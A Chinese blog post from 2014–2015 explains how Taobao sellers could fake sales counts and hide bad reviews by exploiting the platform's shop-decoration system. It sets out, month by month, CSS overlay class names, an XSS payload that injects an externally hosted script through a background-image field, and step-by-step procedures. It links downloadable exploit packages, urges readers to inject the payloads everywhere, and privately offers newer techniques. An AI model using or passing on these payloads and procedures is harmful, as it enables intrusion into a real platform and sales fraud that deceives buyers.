艺灵设计

全部文章
×

曝淘宝网往期改销量多处漏洞

作者:艺灵设计 - 来源:http://www.yilingsj.com - 发布时间:2014-06-12 20:53:58 - 阅: - 评:17 - 积分:0

见标题之其文,本文主要讲述往期改销量的多处漏洞以及操作方法。当然了,要知道每一个漏洞在刚出来时都是价值在1万左右,所以此文也价值不菲哦!洒家已转行,不干淘宝了,下面送些福利给你们。

2011年年底到2014年2月份之间的改销量略过,洒家与2013年8月中旬开始接触淘宝,对于之前改销量这回事听都没有听过,且恕洒家孤陋寡闻。

2月份漏洞

话说在2014年2月中旬时,一个偶然机会让洒家见识了传说中的改销量。按照正常人的思路来说:淘宝是何等大的一个平台,再说人家都干了10来年了,你竟然可以改系统销量,打死我我也不会相信。当初洒家也是这样想的,但在看到链接后才解开谜团,原来是如此的简单,就如同此版块发布的多篇特效中的遮罩原理一样。通过调节z-index的值来实现,网站文章如何修改淘宝店铺月销量上万以及屏蔽系统差评(积分文章,不喜勿点!)有详细说明。那时网上会做的人还不多,而且卖家还必须要开通CSS权限,一季是600块,做的都是土豪啊!
代码存活时间: ?--2014年3月底
漏洞类型:店铺装修权限
漏洞代码:见32个样式(积分文章,不喜勿点!)
操作方法:给自定义的内容添加系统某样式名

3月份漏洞

2014年3月中旬,洒家破解了无须开通css改销量的方法,当时全网暂无二者。原文参见于未付费店铺也可修改淘宝店铺月销量及差评(积分文章,不喜勿点!)。其破解的原理早在2014年1月20号就已经公布了,只时那里洒家还不知道改销量这回事罢了。破解原理见原文c店完全自定义样式(积分文章,不喜勿点!)
代码存活时间:2014年3月12号--2014年3月31号晚8时
漏洞类型:店铺装修权限
漏洞代码:.tshop-pbsm-shop-nav-ch
操作方法:给自定义的内容添加系统样式名 tshop-pbsm-shop-nav-ch

4月份漏洞

大概是2天左右的时间,代码覆盖法改销量又原地满血复活了,原来此时淘宝的过滤中没有屏蔽掉仅存的一个popup-content,于是又有大量的土豪开始改销量了。
代码存活时间:2014年4月2号左右--2014年4月9号晚
漏洞类型:店铺装修权限
漏洞代码:未屏蔽的样式名.popup-content
操作方法:给自定义的内容添加系统样式名popup-content

在淘宝实施新规的前一天晚上,淘宝大姨妈来了,仅存的一个popup-content难逃一劫。全网顿时好安静,所有改销量的都心灰意冷了,但他们都不甘心。就在希望破灭之际,正如电视剧中那样,救世主出现了。此人用js修改,1500一款,漏洞1万,那时真是风光了一段时间。
在放漏洞代码前先插播一段。乌云网上曾提交过淘宝此漏洞,如下图: 算算时间已经快1年了,但js依旧重现江湖,可见当时淘宝修复的效果如何。乌云网原文淘宝某漏洞可插入任意js做到伪造等级销售量等,有兴趣的可点击浏览。继续开讲
代码存活时间: 4月12号左右--4月21号晚
漏洞类型:XSS
漏洞代码:background-image:url(</StyLE//></style></style><script src='xxx.js'><style> #content background-image: url);(xxx.js链接为自己空间的链接地址,咳咳,这个空间不是qq空间!)
插入地方:页头背景或页面背景。
操作方法:修改后台页面中某一表单对应的inputvalue值即可,再点击保存→→再新建详情→→创建唯一标识模块→→发布→→出售中的宝贝→→选择刚新建的详情→→确认→→在地址修改自己的js文件→→上传至服务器端→→几分后再刷新页面即可。(注:无论是先上传js还是先插入代码,链接不能错,否则无效!)如果附几张图的话,可能部分亲们会更加明白些,已会的请略过n步骤!
代码模版:内有注释说明
2014年4月11号改销量漏洞代码
打包下载:2014年4月11号改销量漏洞代码 

4月23号的漏洞代码。  2014.06.13 21:30更新

话说4月21号晚,淘宝来大姨妈了。全网安静了2天,然后开始有人接单了。此次的漏洞代码比较杂,各个门派都有,不过万变不离其宗。这次修改方法仍旧跟上次一样,唯一变化的就是漏洞代码发生了细微变化。
插播一段。近期乌云上又出现大量提交此漏洞的文章,如: 图中是再次近期提交的截图,当然提交此漏洞的大有人在,就不一一举例了,有兴趣的去乌云网搜索吧。继续开讲
代码存活时间:4月23号左右--4月29号晚
漏洞类型:XSS
漏洞代码一:完整格式见压缩包,这里只放链接http://kissy-shop.oss.aliyuncs.com/bug.js这个js很牛b,我怎么看都像是系统的,可能老眼昏花的缘故吧。为什么说他很牛b呢?传说可以单独清零中差评,店铺也是见过的,但是不是障眼法就不知道了。
漏洞代码二:见压缩包
漏洞代码三:见压缩包
这个是个人专属写法。吐槽一下, bktuiguang.com 是个垃圾网站,专业偷取代码20年!一点都不害臊么?!垃圾!!!
插入地方:页头背景或页面背景。
操作方法:同上文。
打包下载:2014年4月23号改销量漏洞代码.zip
其实这次的漏洞入口跟上次的还是同一个漏洞入口,唯一改变的就是漏洞代码。每次更新,真正起作用的还是这个。好了,4月份的js改销量漏洞已曝完。

5月7号的漏洞代码。  2014.06.18 21:00更新

话说上次4月29号晚淘宝来大姨妈后,虽然网上也有接单的声音,但是不是虚张声势就不加以猜测了。直到5月7号时,逐渐开始有人接单。此次又回到了以前css改销量的时代,那叫个苦逼啊!
代码存活时间:5月7号左右--5月13号晚
漏洞类型:模块漏洞(也可追溯到设计师权限)
漏洞代码:两个9010模块以及一个神秘A神秘B(某些套代码同行永远套不出“神秘A”与“神秘B”是多少,哈哈!)
操作方法:后台新建3个自定义模块,然后对其进行对号入座。在两个9010模块中分别放入“销量”与“评价”的内容。来看一下所谓的9010模块在后台中长什么样,如下图: 怎么样,9010模块强大吧,模块本身多了一个提供写css的功能。当然了,css限制大小是6k以内。此时如果你以为就结束了那还早了点。起码“神秘A”和“神秘B”还没有登场。再放一张“神秘A”的后台截图: 好了,不卖关子,直接挑明了说吧。如果没有神秘A,那么两个9010模块就无法保存;如果没有神秘B,那么后台的一切操作就发布不了!有关神秘A与神秘B的内容以及具体的修改操作方法见压缩包。
打包下载:2014年5月7号改销量漏洞代码.zip 

话说早在4月11号时洒家就已发表了篇淘宝bug之设计师权限完爆旺铺CSS,只是当时游走在漏洞边缘......

5月13号的漏洞代码。  2014.06.25 21:00更新

5月13号晚淘宝大姨妈如期而至,5月7号的那个9010死于非命。虽然也有傻b同行用修复的方法使其复活,但用“代码覆盖法改销量”您老人家不觉得累么?!
代码存活时间:5月7号左右--5月20号18:00
漏洞类型:模块权限
漏洞代码:一个“终极大Boss”即可完事
操作方法:后台新建终极大Boss模块,放入js外链即可

前面说了一个神秘A与一个神秘B,此次不再用神秘二字来体现,直接晋级到Boss级别,而且还是“终极”,可想其有多牛了。来放一张终极大Boss模块的截图: 看到这里很多亲会不解其牛b之处,且听洒家道来。

看标题,来跟我一起读一遍:完全自定义内容区。什么?完全自定义内容区,我后台的怎么只有自定义内容区而没有“完全”两个字呢?如果亲想到了这个,那么恭喜亲答对了,这个就是此次漏洞的关键。什么叫做完全呢?这个洒家就不多解释了,亲们可以自己体会。经洒家测试发现,此终极大Boss可任意写csshtml,而且js外链也不在话下。只可惜有些傻x同行一直用个破代码覆盖法在那里掺和。而且洒家还发现此终极大Boss并非只有一个,曾发现了5个。只可惜在换公司时忘记带出来了,目前只记住了两个。至于如何让终极大Boss现身呢,答案就在下面的压缩包内。
打包下载:2014年5月13号改销量漏洞代码.zip   

由于5月18号后洒家有事请假一个多星期,对5月20号后的改销量没有时间研究,略过。不过有一点是可以肯定的,还是模块漏洞!

6月3号到6月17号的漏洞代码。  2014.07.02 21:30更新

洒家曾于5.1号发布了篇如何去掉天猫产品右侧坑爹的手机引流入口,万万没想到的是,这个竟然会成为6月份改销量的漏洞入口的起源,罪过。坑爹,洒家两次都与漏洞擦肩而过,悲哀......

话说整个6月份淘宝来了4次大姨妈,改销量代码也更新了4次。唯一不变的是同前面的一样,漏洞入口不封闭,只增加过滤项而已。现在越来越感觉淘宝像个逗逼,既然你逗那同行也就陪你逗吧。下面来说6月份前两次的代码。
代码存活时间:6月3号--6月10号;6月10号--6月17号
漏洞类型:第三方营销软件
漏洞代码:见压缩包
操作方法:活动中引入css样式表,后台新建自定义模块,将以往的“代码覆盖法”改销量的那些代码放进自定义模块,保存发布,到宝贝管理中勾选要修改的产品,发布即可。
说了这么多,可能还有些亲还是迷糊的,下面来放一张漏洞入口的截图: 打包下载:2014年6月3号到6月17号的2次改销量漏洞代码.zip  (内含前两次的漏洞代码。)

写了这么多漏洞,可能很多亲都在抱怨洒家公布的是失效的漏洞,对此,我只做出以下几点说明:
1.就算现在是失效的,但至少他曾经也辉煌过!难道亲还能从其它地方免费浏览到这么多的漏洞资源???
2.与其说是漏洞失效倒不如说是插入代码失效!我是过来人,淘宝对漏洞是如何处理的我比外行更清楚,在这里我可以明确的告诉亲,文章中提及的这些漏洞入口淘宝都没有封死,只是增加过滤而已。举例:4月份的XSS漏洞仍可插入单独的js;5月份的模块漏洞至今仍可修改模块值;以及6月份的第三方营销软件也是一样,此处略去n万字。
3.淘宝如今成立也10余年了,其目前为止已发现这些漏洞以及未知的漏洞(仅指改销量方面,其它地方略),难道亲不会举一反三到其它地方???(不提倡此举)
4.自己没有研究能力怪不了别人!!!

话又说回不,对于改销量漏洞一事,洒家持以下观点:
1.改销量漏洞可能会像刷单一样一直持续下去,各大网站或多或少在某些方面都有漏洞,这是不可否认的事实。12306那么牛b在黄牛党面前也是不堪一击,更何况淘宝了。对于淘宝的那个500万的计划,洒家一直持怀疑态度,如果像上次那样一个漏洞赏5万的话,也许这500万还够花。
2.在每一个新漏洞遇到淘宝大姨妈时,淘宝完全可以在第一次就将其弄死,为何只是不断的增加过滤字符,难道淘宝里面的程序猿都是吃白干饭的???(当然不排除改销量中有内部人员的可能性)
3.洒家对淘宝大姨妈有过长达几个月的研究,研究发现:淘宝大姨妈自今年3月底开始每周一次,时间是周二17:00--周四22:00之间。也就是说:现在的改销量代码存活期在一周内。市场上现在改销量很泛滥,很多同行都是实行不售后制度,即一性次服务。再想改销量的卖家请看好改后能用的时间!!!
4.针对漏洞修复一事,个人觉得淘宝首先就采用下述方法。对<,>,',",/,\进行过滤。改销量无外乎外链插入(类似挂黑链)无论是<link>还是<style>还是<script>只要对左右括号进行过滤,那么其剩下的就不是一个标签,浏览器中不能识别,自然就加载不了外链,这样可以很大程度上解决掉问题。当然了,对于转义字符(积分文章,不喜勿点!)也是需要进行过滤的,过滤路漫漫!

6月17号到6月30号的漏洞代码。  2014.07.19 21:00更新

刚看到一个店铺,真牛b!改销量的css还挂上面,你这么屌,你空间商知道吗? 代码存活时间:6月17号--6月30号
漏洞类型:第三方营销软件
漏洞代码:见压缩包
打包下载:2014年6月17号到6月30号的2次改销量漏洞代码  

7月上旬淘宝修改销量漏洞  2014.07.21 22:00更新

好久没有更新漏洞了,再来放两处最新漏洞。一处是7月上旬的,另一处是暂时可用的!
代码存活时间:7月上旬
漏洞类型:主图背景
漏洞代码:见压缩包
操作方法:强烈建议小伙伴们将以往洒家提供的往期漏洞注入代码在有【背景图片】、【图片】总之一切能让你修改的地方都不要放过,疯狂的插入测试吧,说不定下一个漏洞就出自你手!
打包下载:2014年7月上旬漏洞代码.zip  

7月21号的漏洞代码。  2014.07.26 21:30更新

代码存活时间:7月21日--?放图一张: 漏洞类型:背景
漏洞代码:见压缩包
操作方法:包内有说明
打包下载:2014年7月21号漏洞代码.zip  

7月26号js修改销量原地满血复活  2014.08.12 15:00更新

淘宝大逗逼,漏洞入口不封,只过滤代码!js修改销量原地满血复活,css修改销量也可以用了。
代码存活时间:7月26号--8月8号
漏洞类型:模块漏洞
漏洞代码:见压缩包
打包下载:2014年7月26号漏洞代码  

2015/01/15号最新技术修改销量+差评  2015.01.15 更新

话说一眨眼就到了2015年,2014年闹的沸沸扬扬的改销量+差评本来早已经风平浪静几个月了。但是,不幸的是:我竟无意间再次发现了淘宝漏洞......

一直没有录制视频,我们来看看视频可好?!title:揭秘真实存在的淘宝/天猫店铺修改销量技术

高清版视频地址:http://static.video.qq.com/TPout.swf?vid=l0149a0rktl&auto=0

代码存活时间:2015.1.15--2015.4.22
漏洞类型:弹出层
漏洞代码:暂未上传

2015/4/23号最新技术修改销量+差评  2015.05.01 更新

前段时间忙于公司的事情,这几天有空了,趁机来更新下文章。

话说2015年淘宝的大姨妈来的超晚,一个漏洞竟然足足活了3个月,你知道是什么概念吗?!好了,我们来说重点:技术已更新,有意者私聊。

代码存活时间:2015.4.23--2015.5.5
漏洞类型:Unicode字符
漏洞代码:暂未上传

2015/5/6号漏洞代码  2015.05.16 更新

代码存活时间:2015.5.6--2015.5.14
漏洞类型:Unicode字符
漏洞代码:暂未上传

2015/5/15号最新可用漏洞代码  2015.06.10 更新

代码存活时间:2015.5.15--2015-06-05
漏洞类型:Unicode字符
漏洞代码:暂未上传

转载声明:
  若亲想转载本文到其它平台,请务必保留本文出处!
本文链接:/code/2014-06-12/159.html

若亲不想直保留地址,含蓄保留也行。艺灵不想再看到有人拿我的技术文章到他的地盘或者是其它平台做教(装)程(B)而不留下我的痕迹。文章你可以随便转载,随便修改,但请尊重艺灵的劳动成果!谢谢理解。

亲,扫个码支持一下艺灵呗~
如果您觉得本文的内容对您有所帮助,您可以用支付宝打赏下艺灵哦!

Tag: 淘宝改销量漏洞 淘宝漏洞 XSS漏洞 修改淘宝销量 代码覆盖法改销量 js改销量 非法模块移植法

上一篇: C店详情页百变全屏背景固定   下一篇: 网购安全防骗篇之识破虚假销量

评论区